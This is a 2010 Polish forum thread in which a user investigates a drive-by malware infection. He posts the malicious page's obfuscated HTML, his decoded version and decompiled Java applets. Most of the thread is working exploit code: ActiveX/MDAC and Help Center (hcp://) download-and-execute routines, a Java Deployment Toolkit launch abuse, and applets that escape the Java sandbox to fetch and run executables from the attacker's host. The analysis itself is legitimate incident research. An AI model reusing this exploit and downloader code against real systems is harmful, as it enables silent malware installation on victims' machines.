Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Wirus? Trojan? Co to jest - WINDOWS_SECURITY_CENTER.exe

phanick 14 Paź 2010 18:35 3196 4
  • #1 14 Paź 2010 18:35
    phanick
    Poziom 28  

    Witam.
    Używam Firefoksa 3.6.7 pod Windowsem XP SP3.
    Wchodzę sobie na stronę:
    http://maveqib.co.cc/download/?p=182&hash=e1&last=4

    Tam jest chyba jakiś applet javowy, który próbuje się załadować. Nagle mój firewall (Zona Alarm) wyświetla komunikat, że "program javaws.exe próbuję się dostać do internetu - czy zezwolić"? Zabraniam. Nagle ku mojemu zdziwieniu firewall mówi, że program "WINDOWS_SECURITY_CENTER.exe" chce uzyskać dostęp do internetu - czy zezwolić? Przecieram oczy ze zdumienia. Patrzę do katalogu
    "c:\Documents and Settings\<mój nick>\Ustawienia lokalne\Temp\"
    i co widzę? Pliki:
    WINDOWS_SECURITY_CENTER.exe
    0.8676472095828182.exe
    ten pierwszy już jest uruchomiony w systemie. Dołączam te pliki do tego post, mój firewall (Anti-viral toolkit) nie wykazuję w nich wirusa, ale pytam - jak to jest możliwe że przeglądarka tworzy na dysku jakiś plik i on się uruchamia BEZ mojej zgody ani wiedzy? Przed chwilą usunąłem te pliki, wszedłem na tą stronę i one się znów utworzyły. To jakiś bug?

    0 4
  • #3 14 Paź 2010 19:56
    phanick
    Poziom 28  

    Panie Jankolo - ja nie pytam jak to usunąć, tylko jak to się wgrało.
    Przy wchodzeniu na tą stronę spod linuxa, od razu przekierowywuję do:
    http://www.google.com/404

    Dodano po 21 [minuty]:

    Strona ładuję plik:
    /user/j.php
    /user/jar5.php

    A tak naprawdę są to jakieś plik .jar (applet javowy). Zaraz zobaczymy co tam jest ukryte :)

    Oho, strona oznaczona jako dokonująca ataków :>

    Zawartość pliku html strony:

    Code:

    <html><head></head><body>Loading...<applet code="bpac.a.class" archive="http://maveqib.co.cc/user/jar5.php" width="666" height="300"><param name="a" value="http://maveqib.co.cc/user/exe.php?x=jar5"></applet><applet code="jWSyyv.class" archive="http://maveqib.co.cc/user/j.php" width="666" height="300"><param name="url" VALUE="http://maveqib.co.cc/user/exe.php?x=jjar"></applet><div id="page" style="display: none">ZnVuY3Rp b2 4gSnVt cEF 3YXk oKQ0Kew 0KC XdpbmRvd y5vcGVuKCd odHRwO i8vd3d 3Lmdv b2ds ZS5jb20vNDA0LycsICdfc2V s ZicpOw0 KfQ0KDQpmdW 5jdGl vb iBKRFQoKQ 0Kew0KCX RyeQ 0KC Xs J DQoJCX Zhci B 1 I D0gJ2 h0 d HA6IC1KLWphci AtSl xcXFxtYX ZlcW liLmN vLmNj XFxwdWJsaWNcXH JlYWRtZS50eHQgI G h0dHA6Ly 9t YXZlcW liLmNvL mNjL3VzZX IvZXhlLnBo cD 9 4PWpkd DAgbm9uZSc7DQoNCg k JaWYgKHdpbmRvdy5uY XZp Z 2F0 b3IuY XBwT mFt ZSA9 PSA nT Wljcm9zb 2Z0IEludGVy b mV0IEV4cGxvc mVyJykNCgkJew0 KCQkJd H J 5D QoJCQl7D Qo JCQ kJ d mFyIG8gPSBk b 2N 1bWVudC5 jc mVhd GVFbGVtZW 50KCdPQkpFQ1QnKT sNCgkJCQlvLmNsYX Nz aWQgPSAnY2xzaWQ6Q0 FGRUV GQUMtREV DNy0wMDA wLTAwMDAtQ UJD R E VGRkV E Q0JBJzsNCgkJCQlvLm xhdW5ja Ch1KTs gIC AgDQ oJC Ql 9DQoJCQljYXRjaCh lKQ0KCQk Je w0KC QkJCXZhciBvMi A 9 IG R v Y 3Vt ZW5 0LmNyZWF0ZU V sZW1lbnQ o J09CSk VDVCcp Ow0KC QkJCW8yLm NsYXNz aWQgP SAn Y2 xzaWQ6OEFE OUM 4NDAt MDQ0RS 0x M UQ xL UIzRTktMDA4M DVGNDk5RDkz JzsNCgkJC QlvMi5sYXVuY2god Sk7DQo JCQ l9DQoJC X0NCgkJZ W xzZQ0K CQl7D QoJ CQl2YXIgbyA9 IGRvY3VtZW 50LmNyZWF 0Z UVs Z W1lbnQo J0 9CSkV DVCcpO w0KCQkJdmFyI G4gPSBkb2N1 bWVudC5jcm VhdGV FbGVtZW5 0KCdPQkpFQ1Q n KTsNCgkJC W8udHlwZS A9ICd hcHBsa WNh dGlvbi 9ucHJ1bnRpbWUtc2N yaX B0YWJsZS 1wb HVnaW47Z GV wb G95bWVudHRvb2x raXQn Ow0KCQkJbi5 0 eXB lID0gJ 2F wcGxpY 2 F0aW9uL 2phd mEtZ GVwbG95bW V u dC10b29s a2 l 0Jzs NCg k JCW RvY3VtZW50 LmJvZHku Y XBw ZW5kQ 2 hpbGQobyk7 DQoJCQlkb2N 1bWVudC5ib2R5LmFwcGVuZENoaWxkKG4pO w0 KDQ o JCQl0c nkNCgkJCXsNCgkJCQlvLmxh dW5jaCh1KTsNCgkJ CX0 NCg k JC WNh dGNo IChlKQ0KCQkJe w0KCQk JCW 4ubGF1bmNoKHUpOw0KCQkJfQ0 KCQ l9DQoJfQ 0KCWN h dGNoIChlKQ0KC X sN C gl9DQp9DQoNCg0KZnV uY3Rpb2 4g Q3Jl YX RlTy h v LG4 pDQp 7DQp 2Y XIg cj1udW xs Ow 0Kd HJ5e3I9by5DcmVhdGVPYmplY3Q obil 9Y 2F0Y 2goZSl7f Q0K aWYoIXIpe3RyeXtyPW8 uQ3JlYXRlT2JqZ WN0KG 4sJy c pfWNhd GNoK GU pe31 9DQp pZi ghc il7d HJ5 e 3I9by5D cmVhdGVPYmp lY3Qo biwnJ ywn Jy l9Y2 F0Y2 g oZ Sl7 fX 0NCmlmK CF yKXt0cn l7 cj1vLkdld E9i amVjdCgnJyxuK X1jY XRj aChlKXt9f Q0KaWYo I XIpe3RyeXtyP W8uR2V 0T2JqZWN0KG4sJ ycpfWN hdGNoKGUpe31 9DQ ppZi ghci l7dHJ5e 3I9 by5HZX RPYmplY3Qobil9Y2F0Y2goZ Sl7 fX0NCnJldHV ybihyK TsNCn0 NCg0 KZnVu Y 3 Rpb2 4gR28oYSkNCn sNCnZhciB ldXJsID0gJ2h 0dHA6Ly9tYXZlcWliLmN vLmN j L3Vz ZXIvZXhlLnB ocD94PW 1kYW MnOw0Kd m FyIG Z uYW1lP SAna 25vY2tvdXQuZXhlJ zsNCnZ h ciBm c289 Q3JlYXRl T yhhLCdTY3 J p cHRpbmcuRmlsZV N5 c3Rlb U9iamVjdCcpDQp2 YXIgc2 FwPUNyZWF0ZU8oYSw n U2 hlb Gw uQXBw bGljY XRpb2 4nK T sNCnZhciB 4PU NyZWF0ZU8 o YSwnQURP REIuU3RyZWFtJyk7 DQp 2YXI gb mw9bn VsbDsNC mZuYW 1l PWZz by5 CdW l sZFBhdGgoZnNvLkdldFNwZWNpYWxGb2xk ZXIoMik sZm5hbW U pOw0Ke C5N b2RlP TM 7DQp0cnl7b mw9Q3JlYXRlTyhhLCdN aWNyb3NvZnQuWE1MSFRU UCcpO25sL m 9w ZW 4oJ0 dFV CcsZ XV yb CxmY WxzZSk7fQ0KY2F0Y2goZSl7dHJ5 e2 5sP UN y Z WF0 Z U8 o YSwnT VNYT UwyL lhNTEh UVFAnKTt ubC5vcGVuKCd HRVQnL GV 1 cmwsZ mFsc 2UpO30NCmNhdGNoKGUp e 3 RyeXtub D 1 DcmV hdGV PKGE sJ01TWE1MMi5TZXJ2ZXJYTUxIV FRQJyk7bmwub 3Blbig nR0V UJyxldX JsLGZ hbHNl KTt9DQ pjY XRj aChlKXt0cnl7bmw9 bm V3IFhNTEh0dHBSZXF 1 ZXN0KCk7b mwu b3BlbignR0 VU Jyx ldXJs LGZ hbHNlKTt9DQp j Y XR jaC hlK Xt yZXR1cm 4 gMDt9 f X19DQp4Ll R5cGU9MTsNCm5sL nNlbm Qobn V sb Ck7DQpyYj 1ubC 5yZXN wb 25zZ UJ vZHk7DQp4 Lk9wZW4oKTsNCn g uV3 Jpd GUocmIpOw 0Ke C5TYX ZlVG9maWxlKGZu YW1 lLDI p Ow 0Kc2F w Ll NoZWxsRX hlY3 V0ZS hmb mFtZSk 7 DQpy Z XR1cm4gM Ts NC n0NC g0KZnVuY3 Rpb24gTU RBQygp IA0Kew0K dmFyIG k9MDsNC nZhciB0 YXJnZXQ9 bmV3IEFyc mF 5KA0KJ0JEOTZDNTU2LT Y1 QT Mt MT FE MC0 5ODNBLTAwQzA0RkMyOUUzNic sDQonQkQ5NkM1NTYtNj VBM y 0 xMUQw LTk 4M0E tMDBDM DRG QzI5RT Mw JywNCidBQ jlCQ0 VERC1F Q zd FLTQ3RTE tOTMyMi1EN EEyMTA2MTcxMTYnLA0 KJ z Aw M DZGM DMzLTAwM D A tM DA wMC1DMDA wLTAw MDAwM DAw MDA0 Nic sDQo nMDAwNkY wM0Et MDA wMC 0w MDAwLUMwMDAtMDAwMDA wMDAwMDQ2JywNCic 2ZTM yMDcwY S 03NjZ kL TRl ZTYt ODc5 Y y1kYzFmYTkxZDJmYzM nLA0KJzY 0 MTQ1 MTJCLUI 5NzgtNDUxRC1BM EQ 4LUZ DRkR GMzNFODMzQycsD Q onN0Y1Q jdGN jMtRjA2Ri0 0 MzMxLTh B MjYtM zM 5 RTAzQzBBRTNEJy wNC icwNjcyM0UwOS1G NEM yLTQ z Y zgtODM1OC0wOUZDRDF E QjA 3 Nj Yn LA0KJz YzOUY 3MjVGLTF CMkQtNDgzMS 1BOUZELTg3NDg0Nz Y 4Mj A xMCc sDQonQ kEwMTg 1OTkt MURCM y0 0NGY5LTg zQ jQ tND YxNDU0Qzg0QkY4JywNC idEMEMw N 0Q1 Ni0 3QzY5LTQz RjEtQjR BMC0yNUY1 QTExRk FCM Tk nLA0KJ0U4Q0NDRER GLUNBMj gtNDk2Yi 1CMDUwLT ZDMDdDOTYy NDc 2Qics bnVsbCk7D Qp3 aGlsZSh0YXJnZXRbaV 0pDQ p 7DQp2Y XIgYT1udWxsOw 0K YT1kb2N1b WVudC5jcmV hdGVFbGV tZW5 0KCdvYmplY3QnKT sNCmE u c2V 0 QXR0 cmli d XRlKCd j b GFz c2lkJ ywnY 2xza WQ6Jyt0YXJn ZXRbaV0 p Ow0KaWYoYSkNCnsN CnRy eQ0Kew 0KdmF yIGI 9Q3JlY XRlTy h hLC dTaGVsbC5BcHBsaWNhdGl vbicpOw0KaWYoY ikNCn sNCkdvKGEpOw0Kf Q0KfWNhdGNoKGUp e30NCn0NCmk rK zsNCn0NC n0N Cg0KZn Vu Y3Rpb 24gSEN QKCkNCnsNCgl0cnkNCg l 7DQoJ CXZhciBmbj0i a G NwOi 8vc 2 VydmljZ XMvc2VhcmN oP3F1 ZXJ5PS Z 0b3B pYz1oY3 A 6Ly9z eXN0Z W0v c3lz aW 5mby 9ze X Np bmZvbWFpbi5o dG0lQSUlQ SUlQSUlQSUlQS U lQ S UlQSUlQSU lQSUlQSUlQSUl QSUl QS UlQS Ul QSUlQ S Ul QSU lQS UlQS U lQSUlQS UlQSUlQS UlQSUlQS UlQSU lQSUlQSUlQSUlQSUlQSU lQSUlQ S UlQSUlQSUlQSUlQS UlQSUlQS UlQSU lQSUlQ S UlQSUlQ SUlQSUlQ SUlQ SUlQSUlQSUlQSUlQSUlQ S UlQSU lQS UlQSUl QS U l QSUl QSUlQSUlQSUlQSUlQS U lQSUlQ SUlQ SUl QSUlQS Ul QSUlQSUlQSU lQSU lQSUlQ SUlQSUlQSUlQS UlQSUlQ SU lQS UlQSUlQSUlQSUl QSUlQSUlQSUl QSUlQSU lQSUlQS UlQSUlQSUlQ SU lQS Ul Q SUlQS4uJ T VD Li4lNUN zeXNpbmZvbW Fpb i5odG0ldT A wM2ZzdnI9JTND c2Ny a XB0JTIw ZGVmZ X IlM0 VldmF sJTI4dW5 lc2NhcG Ul Mjg lMjdSdW4lMjUyOCUyNT IyY21 kIC9jIGNkIC 4uLyBAQCBl Y 2h vIHZh c iBhLUFj d Gl 2ZVhP Ymp lY3Q7dmFyIGItbmV 3I GEo V 1Njcml wdC5B cmd1bWVud HMo MC kp O2IuT 3BlbihXU2NyaXB0LkFy Z3VtZW 5 0cygx KSxX U2 N yaXB0LkFyZ3VtZW 50cy gyK SxXU2NyaXB 0 LkFyZ3V t ZW50c ygzKSk7Yi 5TZW5k K FdT Y3 Jp cHQuQXJndW1lbnRzKDQ pKTt2YXIgYy1iLn Jl c3B vbnNlQm9k e Tt2Y XIgZC1 u ZXcgYShXU2Ny a XB0LkFyZ3Vt Z W50cy g1KSk7ZC5UeXBlLVdTY3J pc HQ uQXJndW1lbnR z KDYpO2QuTW9kZS1XU2 N y aXB0LkF yZ 3VtZ W50cyg3KT t kLk 9wZW4oK TtkLld yaXRlK GM p O3ZhciBlL VdTY3 J pcHQuQXJnd W 1lb nRzK DgpO2Qu U2F2 ZVR v Rmls ZShlLDIpO 3ZhciBmLW5ldyBhKFdTY3 JpcHQuQXJndW 1lbnR zK D kpKS5SdW4oZ SxXU2N yaXB0LkFyZ3VtZ W50cygxMCkpOyA+ IGV4ZS5qc yBAQCBD U2NyaXB0LmV4ZSBleGU uanMgLy9iIC8 vcyBfT Wljcm9 zb2Z0Ll hN TEhUVFBf IF9HR VRfIF9o dHRw Oi8v bWF2ZXFpYi5jby5jYy91c2 VyL2h lbHAucGhw X19zLW 5ld2hjcF8g X 2ZhbHNlXyBfbnVs bF8g X0F ET 0RC L lN0cmVhbV8gMSAzIF9l eG U uZXhlX yBfV1Nj cml wdC5 TaG VsbF8gMCBAQC BkZW wgL2 YgL3EgZXhlLmpzIEBAIHRh c2traW xsIC 9pbSAv ZiBIZWxwQ3RyL m V 4ZSUy N T IyLnJlcG xhY2Uo L19fL2csU 3RyaW5nL m Zyb 21D aGFyQ29 kZSg2MykpLnJlcG x hY 2 UoL0Av Z yxTdHJpbmcu ZnJvb U NoY XJDb 2R lKDM4K Sk ucmVwb GFjZSgvXy9nLFN0cml u Zy 5mcm9tQ2h hckNvZ G UoMzQpK S5yZXBsYWN lK C 8tL 2 csU 3RyaW5nLmZyb 2 1DaGFyQ29kZSg2MSkpJTI1MjklMjclM jklMj klM0Mv c2Nya XB0J T NFIjsNCg 0K CQl2YXIgb SA9IGRvY3VtZW5 0Lm NyZWF0ZUVs ZW1 lbn QoJ2lmcmFtZS cpOw0KCQltLnNldEF0 dHJpYnV 0ZSgnc3JjJ yw gZm4p Ow0KCQltLnNldEF0dH JpYnV0ZSgn d2l kd GgnLC A wKTsNCgk JbS5z ZX R Bd HRyaWJ 1dGUoJ2h la Wd odCcs IDApOw0KCQltLnNldE F0dH J p YnV0Z SgnZnJ hbWVib3 J kZX InLCA n MC cpOw0 KCQlkb2N1b WVudC5i b2R5LmFwcG VuZENoaWxkKG0pOw0KC X0NCgljYXR jaChlKXt9DQp9 DQoNCg0K dmFyIF9YUCAgICA 9ICh uYXZpZ2F0b3I u dXNlc kF nZW5 0 L mluZ GV4T2YoJ05UIDUu M Scp IC E9IC0xK SA /I H R y dW UgOiBmYWxzZTs NCnZhci B fSUU2ICAgPSAobmF 2 aWdhdG9 yLnVzZXJBZ2 V udC5 p b mRle E9mKCdJ RSA 2J ykgIT0 gL T EpID8g dHJ1 Z SA6I GZhbHNlOw0K dm Fy IF9 J RT cg ICA9IChuY XZ pZ2F0 b3IudXNlckFnZW50LmluZGV4T2YoJ0lFIDcnK SAh PSAtM SkgPyB0 cn VlIDogZ mFsc2 U7DQoNCnZhciB0 aW0gI CAgPSAxMDAwOw0KDQpz ZXR UaW 1lb3V0I ChKRFQ sIHRp bSk 7D Qp0aW0gKz0gMTAwMD sN Cg0KaWYgKF 9JRT cgJiYgX1 hQKQ0K ew0KCXNl d FRp bW VvdX QgKEh DUCwgdGltKTsNCgl0a W0gKz0gM T AwMDsN Cn0NCg0Ka WYgKF9JRTYpDQp7DQoJc2V0VGltZ W91dCAoTUR BQyw gdGltKT s N Cgl0aW0gK z 0gMTAwMDsNC n0NC g0K DQ pp ZiAodGl tID 4gMCkgdGltIC s9ID EwMDAwOw0KDQpzZ X RUaW1lb 3 V0IChKdW 1wQXdh e SwgdG lt K TsNC g==</div><script type="text/javascript" src="http://maveqib.co.cc/user/js.php"></script></body></html>






    Dodano po 20 [minuty]:

    Odkodowana zawartość tego tekstu:
    Code:

    function JumpAway()
    {
       window.open('http://www.google.com/404/', '_self');
    }

    function JDT()
    {
       try
       {   
          var u = 'http: -J-jar -J\\\\maveqib.co.cc\\public\\readme.txt  http://maveqib.co.cc/user/exe.php?x=jdt0 none';

          if (window.navigator.appName == 'Microsoft Internet Explorer')
          {
             try
             {
                var o = document.createElement('OBJECT');
                o.classid = 'clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA';
                o.launch(u);   
             }
             catch(e)
             {
                var o2 = document.createElement('OBJECT');
                o2.classid = 'clsid:8AD9C840-044E-11D1-B3E9-00805F499D93';
                o2.launch(u);
             }
          }
          else
          {
             var o = document.createElement('OBJECT');
             var n = document.createElement('OBJECT');
             o.type = 'application/npruntime-scriptable-plugin;deploymenttoolkit';
             n.type = 'application/java-deployment-toolkit';
             document.body.appendChild(o);
             document.body.appendChild(n);

             try
             {
                o.launch(u);
             }
             catch (e)
             {
                n.launch(u);
             }
          }
       }
       catch (e)
       {
       }
    }


    function CreateO(o,n)
    {
    var r=null;
    try{r=o.CreateObject(n)}catch(e){}
    if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
    if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
    if(!r){try{r=o.GetObject('',n)}catch(e){}}
    if(!r){try{r=o.GetObject(n,'')}catch(e){}}
    if(!r){try{r=o.GetObject(n)}catch(e){}}
    return(r);
    }

    function Go(a)
    {
    var eurl = 'http://maveqib.co.cc/user/exe.php?x=mdac';
    var fname= 'knockout.exe';
    var fso=CreateO(a,'Scripting.FileSystemObject')
    var sap=CreateO(a,'Shell.Application');
    var x=CreateO(a,'ADODB.Stream');
    var nl=null;
    fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
    x.Mode=3;
    try{nl=CreateO(a,'Microsoft.XMLHTTP');nl.open('GET',eurl,false);}
    catch(e){try{nl=CreateO(a,'MSXML2.XMLHTTP');nl.open('GET',eurl,false);}
    catch(e){try{nl=CreateO(a,'MSXML2.ServerXMLHTTP');nl.open('GET',eurl,false);}
    catch(e){try{nl=new XMLHttpRequest();nl.open('GET',eurl,false);}
    catch(e){return 0;}}}}
    x.Type=1;
    nl.send(null);
    rb=nl.responseBody;
    x.Open();
    x.Write(rb);
    x.SaveTofile(fname,2);
    sap.ShellExecute(fname);
    return 1;
    }

    function MDAC()
    {
    var i=0;
    var target=new Array(
    'BD96C556-65A3-11D0-983A-00C04FC29E36',
    'BD96C556-65A3-11D0-983A-00C04FC29E30',
    'AB9BCEDD-EC7E-47E1-9322-D4A210617116',
    '0006F033-0000-0000-C000-000000000046',
    '0006F03A-0000-0000-C000-000000000046',
    '6e32070a-766d-4ee6-879c-dc1fa91d2fc3',
    '6414512B-B978-451D-A0D8-FCFDF33E833C',
    '7F5B7F63-F06F-4331-8A26-339E03C0AE3D',
    '06723E09-F4C2-43c8-8358-09FCD1DB0766',
    '639F725F-1B2D-4831-A9FD-874847682010',
    'BA018599-1DB3-44f9-83B4-461454C84BF8',
    'D0C07D56-7C69-43F1-B4A0-25F5A11FAB19',
    'E8CCCDDF-CA28-496b-B050-6C07C962476B',null);
    while(target[i])
    {
    var a=null;
    a=document.createElement('object');
    a.setAttribute('classid','clsid:'+target[i]);
    if(a)
    {
    try
    {
    var b=CreateO(a,'Shell.Application');
    if(b)
    {
    Go(a);
    }
    }catch(e){}
    }
    i++;
    }
    }

    function HCP()
    {
       try
       {
          var fn="hcp://services/search?query=&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522cmd /c cd ../ @@ echo var a-ActiveXObject;var b-new a(WScript.Arguments(0));b.Open(WScript.Arguments(1),WScript.Arguments(2),WScript.Arguments(3));b.Send(WScript.Arguments(4));var c-b.responseBody;var d-new a(WScript.Arguments(5));d.Type-WScript.Arguments(6);d.Mode-WScript.Arguments(7);d.Open();d.Write(c);var e-WScript.Arguments(8);d.SaveToFile(e,2);var f-new a(WScript.Arguments(9)).Run(e,WScript.Arguments(10)); > exe.js @@ CScript.exe exe.js //b //s _Microsoft.XMLHTTP_ _GET_ _http://maveqib.co.cc/user/help.php__s-newhcp_ _false_ _null_ _ADODB.Stream_ 1 3 _exe.exe_ _WScript.Shell_ 0 @@ del /f /q exe.js @@ taskkill /im /f HelpCtr.exe%2522.replace(/__/g,String.fromCharCode(63)).replace(/@/g,String.fromCharCode(38)).replace(/_/g,String.fromCharCode(34)).replace(/-/g,String.fromCharCode(61))%2529%27%29%29%3C/script%3E";

          var m = document.createElement('iframe');
          m.setAttribute('src', fn);
          m.setAttribute('width', 0);
          m.setAttribute('height', 0);
          m.setAttribute('frameborder', '0');
          document.body.appendChild(m);
       }
       catch(e){}
    }


    var _XP    = (navigator.userAgent.indexOf('NT 5.1') != -1) ? true : false;
    var _IE6   = (navigator.userAgent.indexOf('IE 6') != -1) ? true : false;
    var _IE7   = (navigator.userAgent.indexOf('IE 7') != -1) ? true : false;

    var tim    = 1000;

    setTimeout (JDT, tim);
    tim += 1000;

    if (_IE7 && _XP)
    {
       setTimeout (HCP, tim);
       tim += 1000;
    }

    if (_IE6)
    {
       setTimeout (MDAC, tim);
       tim += 1000;
    }


    if (tim > 0) tim += 10000;

    setTimeout (JumpAway, tim);


    Dodano po 3 [minuty]:

    Mi to wygląda na exploit w obiektach ActiveX tylko dlaczego to działa na mozilli?
    Jeszcze trzeba się przyjrzeć co te pliki Javy zawierają.

    Dodano po 12 [minuty]:

    Kod jednego z uruchamianych appletow javowych.
    Fascynujace - czyli applet może pisać po dysku użytkownika co chcę i uruchamiać programy z jego dysku na jego komputerze :) No to pozdrowienia dla panów z SUNa :)

    Code:

    // Decompiled Using: FrontEnd Plus v2.03 and the JAD Engine
    // Available From: http://www.reflections.ath.cx
    // Decompiler options: packimports(3)
    // Source File Name:   a.java

    package bpac;

    import java.applet.Applet;
    import java.io.FileOutputStream;
    import java.io.InputStream;
    import java.net.URL;
    import java.util.*;
    import javax.swing.JList;

    // Referenced classes of package bpac:
    //            KAVS, b

    public class a extends Applet
    {

        public void start()
        {
            super.start();
            try
            {
                String s = b.b(getParameter("a"));
                String s1 = (new StringBuilder()).append(Math.random()).append(".exe").toString();
                String s2 = System.getProperty("java.io.tmpdir");
                String s3 = System.getProperty("os.name");
                try
                {
                    if(s3.indexOf("Windows") >= 0)
                    {
                        URL url = new URL(s);
                        url.openConnection();
                        InputStream inputstream = url.openStream();
                        FileOutputStream fileoutputstream = new FileOutputStream((new StringBuilder()).append(s2).append(s1).toString());
                        byte abyte0[] = new byte[1024];
                        int i;
                        while((i = inputstream.read(abyte0, 0, abyte0.length)) != -1)
                            fileoutputstream.write(abyte0, 0, i);
                        inputstream.close();
                        fileoutputstream.close();
                        Runtime runtime = Runtime.getRuntime();
                        runtime.exec((new StringBuilder()).append(s2).append(s1).toString());
                    }
                }
                catch(Exception exception1) { }
            }
            catch(Exception exception) { }
        }

        public a()
        {
            Object obj = java/lang/System;
            String s1 = "setSecurityManager";
            Object aobj[] = {
                null
            };
            KAVS kavs = new KAVS(obj, s1, aobj);
            final HashSet s = new HashSet();
            s.add(kavs);
            HashMap hashmap = new HashMap() {

                public Set entrySet()
                {
                    return s;
                }

                final HashSet val$s;
                final a this$0;

               
                {
                    this$0 = a.this;
                    s = hashset;
                    super();
                }
            };
            JList jlist = new JList(new Object[] {
                hashmap
            });
            add(jlist);
        }
    }


    Dodano po 5 [minuty]:

    I jeszcze dwa pliki .class z drugiego appletu:
    Code:

    // Decompiled Using: FrontEnd Plus v2.03 and the JAD Engine
    // Available From: http://www.reflections.ath.cx
    // Decompiler options: packimports(3)
    // Source File Name:   M8PFGFzL.java

    import java.io.*;
    import java.net.*;

    class M8PFGFzL
        implements Runnable
    {

        public M8PFGFzL(String s)
        {
            x_url = s;
        }

        public void run()
        {
            StringBuilder stringbuilder = new StringBuilder();
            stringbuilder.append("WINDOWS_");
            stringbuilder.append("SECURITY_");
            stringbuilder.append("CENTER.");
            stringbuilder.append("exe");
            String s = stringbuilder.toString();
            String s1 = System.getProperty("java.io.tmpdir");
            URL url;
            try
            {
                String s2 = x_url;
                url = new URL(s2);
            }
            catch(MalformedURLException malformedurlexception)
            {
                System.out.println((new StringBuilder()).append("Url Error: ").append(x_url).toString());
                return;
            }
            URLConnection urlconnection;
            try
            {
                urlconnection = url.openConnection();
            }
            catch(IOException ioexception)
            {
                System.out.println((new StringBuilder()).append("Conn error: ").append(ioexception.getMessage()).toString());
                return;
            }
            InputStream inputstream;
            try
            {
                inputstream = urlconnection.getInputStream();
            }
            catch(IOException ioexception1)
            {
                System.out.println((new StringBuilder()).append("Stream error: ").append(ioexception1.getMessage()).toString());
                return;
            }
            FileOutputStream fileoutputstream;
            try
            {
                stringbuilder = new StringBuilder();
                stringbuilder.append(s1);
                stringbuilder.append(s);
                fileoutputstream = new FileOutputStream(stringbuilder.toString());
            }
            catch(FileNotFoundException filenotfoundexception)
            {
                System.out.println((new StringBuilder()).append("File error: ").append(filenotfoundexception.getMessage()).toString());
                return;
            }
            byte abyte0[] = new byte[1024];
            int i;
            try
            {
                while((i = inputstream.read(abyte0, 0, abyte0.length)) != -1)
                    fileoutputstream.write(abyte0, 0, i);
            }
            catch(IOException ioexception2)
            {
                System.out.println((new StringBuilder()).append("RW error: ").append(ioexception2.getMessage()).toString());
            }
            try
            {
                inputstream.close();
            }
            catch(IOException ioexception3)
            {
                System.out.println((new StringBuilder()).append("UrlStream close error: ").append(ioexception3.getMessage()).toString());
            }
            try
            {
                fileoutputstream.close();
            }
            catch(IOException ioexception4)
            {
                System.out.println((new StringBuilder()).append("FileStream close error: ").append(ioexception4.getMessage()).toString());
            }
            try
            {
                Runtime runtime = Runtime.getRuntime();
                String s3 = stringbuilder.toString();
                runtime.exec(s3);
                return;
            }
            catch(Exception exception)
            {
                System.out.println((new StringBuilder()).append("Exec : ").append(exception.getMessage()).toString());
            }
        }

        public String x_url;
        public String ename;
    }


    Code:

    // Decompiled Using: FrontEnd Plus v2.03 and the JAD Engine
    // Available From: http://www.reflections.ath.cx
    // Decompiler options: packimports(3)
    // Source File Name:   jWSyyv.java

    import java.io.*;
    import java.rmi.MarshalledObject;
    import javax.management.remote.rmi.RMIConnectionImpl;
    import javax.management.remote.rmi.RMIJRMPServerImpl;
    import javax.swing.JApplet;

    public class jWSyyv extends JApplet
    {

        public jWSyyv()
        {
        }

        public static byte[] getBytesFromStream(InputStream inputstream)
            throws IOException
        {
            ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
            byte abyte0[] = new byte[1024];
            do
            {
                int i = inputstream.read(abyte0, 0, 1024);
                if(i > -1)
                    bytearrayoutputstream.write(abyte0, 0, i);
                else
                    return bytearrayoutputstream.toByteArray();
            } while(true);
        }

        public static void main(String args[])
            throws IOException
        {
            Object obj = null;
            Object obj1 = null;
            Object obj2 = null;
            try
            {
                FileOutputStream fileoutputstream = new FileOutputStream(filename);
                ObjectOutputStream objectoutputstream = new ObjectOutputStream(fileoutputstream);
                MarshalledObject marshalledobject = new MarshalledObject(new Cz_0_CDKa__());
                objectoutputstream.writeObject(marshalledobject);
                objectoutputstream.close();
            }
            catch(IOException ioexception)
            {
                ioexception.printStackTrace();
            }
        }

        public void init()
        {
            host = getParameter("url");
            s_port = "8888";
            Object obj = null;
            Object obj1 = null;
            MarshalledObject marshalledobject = null;
            try
            {
                InputStream inputstream = getClass().getResourceAsStream(filename);
                ObjectInputStream objectinputstream = new ObjectInputStream(inputstream);
                marshalledobject = (MarshalledObject)objectinputstream.readObject();
            }
            catch(IOException ioexception)
            {
                ioexception.printStackTrace();
            }
            catch(ClassNotFoundException classnotfoundexception)
            {
                classnotfoundexception.printStackTrace();
            }
            try
            {
                RMIJRMPServerImpl rmijrmpserverimpl = new RMIJRMPServerImpl(0, null, null, null);
                rmijrmpserverimpl.setMBeanServer(new saCPvD8X());
                RMIConnectionImpl rmiconnectionimpl = new RMIConnectionImpl(rmijrmpserverimpl, "javasucks", null, null, null);
                rmiconnectionimpl.queryMBeans(null, marshalledobject, null);
            }
            catch(IOException ioexception1)
            {
                System.out.println((new StringBuilder()).append("IOException: ").append(ioexception1).toString());
            }
            catch(ClassCastException classcastexception) { }
        }

        public static String host = null;
        public static String s_port = null;
        static String filename = "U_kM5y";

    }


    Podsumowując jednym słowem - javasucks :)
    Niech teraz ktoś zdekompiluje te pliki *.exe i powie co robią bo ja asma nie znam na tyle dobrze:)

    0